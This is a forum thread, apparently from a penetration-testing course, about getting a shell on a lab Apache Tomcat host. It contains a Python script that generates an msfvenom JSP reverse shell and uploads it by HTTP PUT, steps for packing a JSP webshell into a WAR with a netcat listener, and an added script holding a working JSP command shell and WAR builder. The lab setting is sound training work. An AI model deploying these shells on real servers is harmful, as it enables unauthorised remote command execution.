Shells & payloads - The live engagement - host #1

Hi,

Now I’ve been struggling for 10 hours with the first host and couldn’t make any progress, so some serious help would be really appreciated.

I found and followed the following article, which didn’t work:
[How to Hack Apache Tomcat via Malicious WAR File Upload « Null Byte :: WonderHowTo]

I also found the following video, no help:
https://www.youtube.com/watch?v=JTgUI3BKJek

Mixed the two, added my own ideas, but nothing. I was able to upload the WAR file and clicked on it, but nothing happened, although I tried out both Netcat and Metasploit as a listener.

In addition, I’m probably missing something, but the given version of Tomcat doesn’t have any critical or high-level vulnerabilities.
https://tomcat.apache.org/security-10.html

I’m really clueless, the linked solutions should work but they don’t, so…


Hey Zsombi

I’m also having the same issues as you and have spent about the same time as you have. I’ve tried different payloads and tried using the other IPs listed in ifconfig. I got nothing to work through Metasploit; I managed to upload a .war webshell that works somewhat, but it looks like the output is being filtered out (here’s the web shell: GitHub - p0dalirius/Tomcat-webshell-application: A webshell application and interactive shell for pentesting Apache Tomcat servers). There’s also a good set of examples here (Tomcat - HackTricks); I tried both webshells there as well.

I’m wondering if the target has been updated, as you mentioned there are no high-level vulnerabilities for the version that is currently running. Hopefully someone can help us two aspiring pen testers out!

Use msfvenom for this and all will be fine.


I’m stuck on HOST-1: I tried creating a WAR file with a Java reverse shell in Msfvenom and uploading it to Tomcat, but I get an HTTP 500 error when I try to deploy it for a reverse shell. I also tried using the Msfconsole Tomcat_mgr_upload exploit, but it doesn’t work there either. Can anyone give me a hint? I have no clue after working on this for many hours…

Were you able to fix this?


I am facing the same problem.
Is there any way to solve this?

Hello everyone… I got stuck on “Exploit the target and gain a shell session. Submit the name of the folder located in C:\Shares\ (Format: all lower case)”. While scanning with nmap it shows only one port open, i.e. 3389, and I don’t know how to proceed with this.

Make sure you’re scanning the right target; remember you’re connecting to a host via RDP first and then scanning the target. If you scan the host IP you’ll only get the open port 3389.

I’m lost on that one. My WAR file generated with msfvenom doesn’t work. I keep getting HTTP Status 500 - Internal Server Error when I try to execute it. If I try it again after some time, I get 404 - Not Found.

HTTP Status 500 – Internal Server Error

Type Exception Report

Message Error instantiating servlet class [metasploit.PayloadServlet]

Description The server encountered an unexpected condition that prevented it from fulfilling the request.

Exception

jakarta.servlet.ServletException: Error instantiating servlet class [metasploit.PayloadServlet]
org.apache.catalina.authenticator.AuthenticatorBase.invoke(AuthenticatorBase.java:541)
org.apache.catalina.valves.ErrorReportValve.invoke(ErrorReportValve.java:92)
org.apache.catalina.valves.AbstractAccessLogValve.invoke(AbstractAccessLogValve.java:690)
org.apache.catalina.connector.CoyoteAdapter.service(CoyoteAdapter.java:353)
org.apache.coyote.http11.Http11Processor.service(Http11Processor.java:382)
org.apache.coyote.AbstractProcessorLight.process(AbstractProcessorLight.java:65)
org.apache.coyote.AbstractProtocol$ConnectionHandler.process(AbstractProtocol.java:870)
org.apache.tomcat.util.net.NioEndpoint$SocketProcessor.doRun(NioEndpoint.java:1699)
org.apache.tomcat.util.net.SocketProcessorBase.run(SocketProcessorBase.java:49)
org.apache.tomcat.util.threads.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1191)
org.apache.tomcat.util.threads.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:659)
org.apache.tomcat.util.threads.TaskThread$WrappingRunnable.run(TaskThread.java:61)
java.lang.Thread.run(Unknown Source)

Root Cause

java.lang.NoClassDefFoundError: javax/servlet/http/HttpServlet
java.lang.ClassLoader.defineClass1(Native Method)
java.lang.ClassLoader.defineClass(Unknown Source)
java.security.SecureClassLoader.defineClass(Unknown Source)
org.apache.catalina.loader.WebappClassLoaderBase.findClassInternal(WebappClassLoaderBase.java:2516)
org.apache.catalina.loader.WebappClassLoaderBase.findClass(WebappClassLoaderBase.java:872)
org.apache.catalina.loader.WebappClassLoaderBase.loadClass(WebappClassLoaderBase.java:1408)
org.apache.catalina.loader.WebappClassLoaderBase.loadClass(WebappClassLoaderBase.java:1252)
org.apache.catalina.authenticator.AuthenticatorBase.invoke(AuthenticatorBase.java:541)
org.apache.catalina.valves.ErrorReportValve.invoke(ErrorReportValve.java:92)
org.apache.catalina.valves.AbstractAccessLogValve.invoke(AbstractAccessLogValve.java:690)
org.apache.catalina.connector.CoyoteAdapter.service(CoyoteAdapter.java:353)
org.apache.coyote.http11.Http11Processor.service(Http11Processor.java:382)
org.apache.coyote.AbstractProcessorLight.process(AbstractProcessorLight.java:65)
org.apache.coyote.AbstractProtocol$ConnectionHandler.process(AbstractProtocol.java:870)
org.apache.tomcat.util.net.NioEndpoint$SocketProcessor.doRun(NioEndpoint.java:1699)
org.apache.tomcat.util.net.SocketProcessorBase.run(SocketProcessorBase.java:49)
org.apache.tomcat.util.threads.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1191)
org.apache.tomcat.util.threads.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:659)
org.apache.tomcat.util.threads.TaskThread$WrappingRunnable.run(TaskThread.java:61)
java.lang.Thread.run(Unknown Source)

Root Cause

java.lang.ClassNotFoundException: javax.servlet.http.HttpServlet
org.apache.catalina.loader.WebappClassLoaderBase.loadClass(WebappClassLoaderBase.java:1444)
org.apache.catalina.loader.WebappClassLoaderBase.loadClass(WebappClassLoaderBase.java:1252)
java.lang.ClassLoader.defineClass1(Native Method)
java.lang.ClassLoader.defineClass(Unknown Source)
java.security.SecureClassLoader.defineClass(Unknown Source)
org.apache.catalina.loader.WebappClassLoaderBase.findClassInternal(WebappClassLoaderBase.java:2516)
org.apache.catalina.loader.WebappClassLoaderBase.findClass(WebappClassLoaderBase.java:872)
org.apache.catalina.loader.WebappClassLoaderBase.loadClass(WebappClassLoaderBase.java:1408)
org.apache.catalina.loader.WebappClassLoaderBase.loadClass(WebappClassLoaderBase.java:1252)
org.apache.catalina.authenticator.AuthenticatorBase.invoke(AuthenticatorBase.java:541)
org.apache.catalina.valves.ErrorReportValve.invoke(ErrorReportValve.java:92)
org.apache.catalina.valves.AbstractAccessLogValve.invoke(AbstractAccessLogValve.java:690)
org.apache.catalina.connector.CoyoteAdapter.service(CoyoteAdapter.java:353)
org.apache.coyote.http11.Http11Processor.service(Http11Processor.java:382)
org.apache.coyote.AbstractProcessorLight.process(AbstractProcessorLight.java:65)
org.apache.coyote.AbstractProtocol$ConnectionHandler.process(AbstractProtocol.java:870)
org.apache.tomcat.util.net.NioEndpoint$SocketProcessor.doRun(NioEndpoint.java:1699)
org.apache.tomcat.util.net.SocketProcessorBase.run(SocketProcessorBase.java:49)
org.apache.tomcat.util.threads.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1191)
org.apache.tomcat.util.threads.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:659)
org.apache.tomcat.util.threads.TaskThread$WrappingRunnable.run(TaskThread.java:61)
java.lang.Thread.run(Unknown Source)

Note The full stack trace of the root cause is available in the server logs.
Apache Tomcat/10.0.11

I tried to create a Python script: this script generates a reverse shell in Java Server Pages (JSP) format, and then uploads it to a target web server using the HTTP PUT method. The target web server is specified by the target_ip and target_port variables, which are set to "172.16.1.11" and 8080 respectively.

The reverse shell is generated using the msfvenom command-line tool and saved to a file named shell.jsp. The contents of this file are then read and stored in the body variable.

Next, the script establishes an HTTP connection to the target web server and sends an HTTP PUT request to upload the reverse shell to the server. The request includes the headers specified in the headers dictionary, which includes information such as the host, user agent, and content type.

Finally, the script checks the response status of the HTTP PUT request, and if it is 204 or 201, it sends an HTTP GET request to retrieve the uploaded reverse shell from the server and prints the response status and reason.

#!/usr/bin/env python3

import http.client
import os

target_ip = "172.16.1.11"
target_port = 8080

print("Generating JSP reverse shell")
# msfvenom writes the raw JSP source to shell.jsp; LHOST/LPORT are the attacker's listener
os.system("msfvenom -p java/jsp_shell_reverse_tcp LHOST=172.16.1.5 LPORT=4444 -f raw > shell.jsp")

body = open("shell.jsp").read()

conn = http.client.HTTPConnection(target_ip, target_port)
headers = {"Host": "%s:%s" % (target_ip, target_port),
           "Accept-Language": "en",
           "User-Agent": "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)",
           "Connection": "close",
           "Content-Type": "application/x-www-form-urlencoded"}
# PUT with a trailing slash: the classic trick for slipping a .jsp past Tomcat's extension check
conn.request("PUT", "/shell.jsp/", body, headers)
r1 = conn.getresponse()
print(r1.status, r1.reason)

# 201 Created / 204 No Content mean the DefaultServlet accepted the PUT (readonly=false)
if r1.status == 204 or r1.status == 201:
    # requesting the JSP makes Tomcat compile and run it, which fires the callback to the listener
    conn.request("GET", "/shell.jsp")
    r2 = conn.getresponse()
    print(r2.status, r2.reason)

I tried a .war file and a .jsp, but that didn’t work either =/

Use the web shell payload available on GitHub. Create a WAR file and replace the JSP file with the webshell script. Upload and run it and you will gain the shell.
Happy Hacking

This took me so long to figure out, and all because of a silly mistake. In case others make the same rookie error as me: when you’re crafting your payload, make sure you’re using the right network interface. It’s not your 10.129.xx IP :man_facepalming:


Has anyone made progress on this? I am wondering if I am missing something. I have attempted to upload a file to the (example.inlanefreight.local) URL, with no luck; after trying to go to the URL I get the 404 error. Moreover, when logging into the URL found in the nmap enumeration, I cannot get my WAR file to connect back to me, or even locate the page after I upload my WAR file and go to the directory; again I am faced with a 404 error. Am I missing something obvious? Would greatly appreciate any feedback on this.

The issue I faced with my WAR file was that I set the wrong IP for it to try and connect back to. It’s not your 10.129.x.

In terms of triggering it, I don’t believe you need to navigate to the file. From memory, there is another button you can click to trigger it within the Tomcat manager interface.*

*I’m pretty sure this is right, but if that doesn’t get you down the right path, DM me and I can jump back into that section and have a better look for you.

Hey, I’m assuming that you are on host 1, right? There are really only a couple of steps. In all honesty it took me a while, so I’ll help others out here too.

  1. Log in to the host and to Tomcat using the credentials you have, then go to the app manager section.
  2. Find a .jsp webshell or reverse shell on GitHub (the first one you find may not work).
  3. If you get it in raw format from GitHub you need to:
    3.1) nano cmd.jsp
    3.2) copy and paste your code; edit the IP and port if necessary
    3.3) mkdir webshell
    3.4) cp cmd.jsp webshell
    3.5) jar -cvf ../webshell.war *
  4. Once you go back a directory you will see your .war file. Upload and deploy it.
    4.1) nc -nvlp (if you are doing a reverse shell)
  5. If you are getting a 500 error it’s not going to work, so find a new shell and repeat the steps. If you get a 400 error you are probably on the wrong path to find your file. When you click on your upload in Apache, or you navigate to your file, make sure you go to the right path; in my example you go to /webshell/cmd.jsp, not just /webshell. You will be taken to /webshell at first, so make sure you navigate to your file.
    *** If you need advice on a webshell to use let me know; I found a great one for this task. This took me forever as well. I thought it was like the box Jerry on the main platform and it lulled me into a false sense of security.
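Editor’s added example (not code from any post in this thread): the 500 page pasted earlier ends with jakarta.servlet.ServletException and a root cause of java.lang.ClassNotFoundException: javax.servlet.http.HttpServlet on Apache Tomcat/10.0.11. Tomcat 10 moved the servlet API to the jakarta.servlet package, so a WAR carrying a servlet class compiled against javax.servlet cannot load there; that is what msfvenom’s Java payloads produce with -f war (a compiled metasploit.PayloadServlet), while a JSP-only WAR (msfvenom -p java/jsp_shell_reverse_tcp -f war, or the hand-packed cmd.jsp from the steps above) is compiled by Tomcat itself against whatever API it ships and deploys fine. The script below packs a JSP into a WAR with Python’s zipfile (standing in for jar -cvf) and scans a WAR’s .class entries for javax/jakarta servlet references against the Tomcat banner, so the mismatch is caught before uploading. The JSP text, the banner strings and the fake .class bytes are constructed here for the demo.

```python
#!/usr/bin/env python3
"""Build a JSP-only WAR and check any WAR for a javax/jakarta servlet-API mismatch."""
import io
import re
import zipfile

# Constructed sample: a minimal JSP command shell, the kind of file the steps above wrap in a WAR.
CMD_JSP = """<%@ page import="java.io.*" %>
<%
  String cmd = request.getParameter("cmd");
  if (cmd != null) {
    Process p = Runtime.getRuntime().exec(cmd);
    BufferedReader r = new BufferedReader(new InputStreamReader(p.getInputStream()));
    String line;
    while ((line = r.readLine()) != null) { out.println(line); }
  }
%>
"""

# Constructed stand-in for a servlet-based payload: class-file magic, a version field and a
# constant-pool UTF8 entry naming javax.servlet's HttpServlet (not a real compiled class).
FAKE_JAVAX_CLASS = b"\xca\xfe\xba\xbe\x00\x00\x00\x34\x01\x00\x1ejavax/servlet/http/HttpServlet"


def build_war(entries):
    """Pack {path: bytes} into a WAR (a WAR is just a zip). A JSP-only WAR needs no
    WEB-INF/web.xml on Tomcat (Servlet 3.0+); the server compiles the JSP on first request."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for path, data in entries.items():
            zf.writestr(path, data)
    return buf.getvalue()


def war_entries(war_bytes):
    """List the paths inside a WAR, in archive order."""
    with zipfile.ZipFile(io.BytesIO(war_bytes)) as zf:
        return zf.namelist()


def servlet_api_refs(war_bytes):
    """Map each .class entry to the servlet API package(s) its constant pool names."""
    refs = {}
    with zipfile.ZipFile(io.BytesIO(war_bytes)) as zf:
        for name in zf.namelist():
            if not name.endswith(".class"):
                continue
            data = zf.read(name)
            if data[:4] != b"\xca\xfe\xba\xbe":  # not a class file, skip
                continue
            # Constant-pool strings are modified UTF-8, so a plain byte search is enough here.
            found = {pkg.decode() for pkg in (b"javax/servlet", b"jakarta/servlet") if pkg in data}
            if found:
                refs[name] = found
    return refs


def tomcat_major(banner):
    """'Apache Tomcat/10.0.11' -> 10; None when the banner carries no Tomcat version."""
    m = re.search(r"Tomcat/(\d+)\.", banner)
    return int(m.group(1)) if m else None


def check_war(war_bytes, banner):
    """Return the problems that would make this WAR 500 on the Tomcat named in the banner."""
    major = tomcat_major(banner)
    problems = []
    if major is None:
        return problems
    for cls, pkgs in servlet_api_refs(war_bytes).items():
        if major >= 10 and "javax/servlet" in pkgs:
            problems.append(f"{cls}: compiled against javax.servlet, but Tomcat {major} ships jakarta.servlet")
        if major <= 9 and "jakarta/servlet" in pkgs:
            problems.append(f"{cls}: compiled against jakarta.servlet, but Tomcat {major} ships javax.servlet")
    return problems


if __name__ == "__main__":
    banner = "Apache Tomcat/10.0.11"  # constructed, matches the version at the foot of the 500 page
    jsp_war = build_war({"cmd.jsp": CMD_JSP.encode()})
    print("JSP-only WAR:", check_war(jsp_war, banner) or "no servlet-API problems")
    servlet_war = build_war({"WEB-INF/classes/metasploit/PayloadServlet.class": FAKE_JAVAX_CLASS})
    for problem in check_war(servlet_war, banner):
        print("servlet WAR:", problem)
```

Run it as-is to see the JSP-only WAR pass and the constructed javax.servlet class get flagged for Tomcat 10; to use it for real, feed build_war your own cmd.jsp and upload the returned bytes through the manager as in step 4.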

On step #4, I only see the Links 2 web browser and no “Upload” button as there would be in Firefox. “Upload and deploy it” should be easy… I’m just missing something.

Just watching this. msfvenom worked, msf exploit did not work. Cheatsheet 115 was helpful.


I hope you solved this issue, but for those still stuck on this module my comment may be useful. The hint is: first, during information gathering, list what information you got, like which server, open ports, any vulnerable server. After that, re-check all the study modules one by one: if you detect a Windows server, check all the Windows modules; if you get Linux, check all the Linux modules. Try all the steps one by one, slowly; you might get it right. When we focus too hard and overthink it, it takes many days to solve these labs.

This was the way to go, specifically making sure you are using the right IP address (172.16.X.X). Also there is an msfvenom command that will work, and you will understand when you see it. :slight_smile:

Well, host 1 is tricky; I spent a couple of hours…

Initially, I tried to upload a web shell; I tried several, including packing my own js into a WAR. It didn’t work: I could upload it and see the application in the list, click on it, and was getting 404 constantly.

Switched to MSF and used multi/http/tomcat_mgr_upload, which basically worked the same way. It was able to upload the payload (random names in the apps list), but failed to execute it. Again, when I manually tried to open MSF’s JSP from the browser, I was getting 404. The listener was started on the proper IP, of course.

And finally, msfvenom, exactly from the cheatsheet did the trick…

I wonder what was happening to the previous payloads, did AV kill them on upload?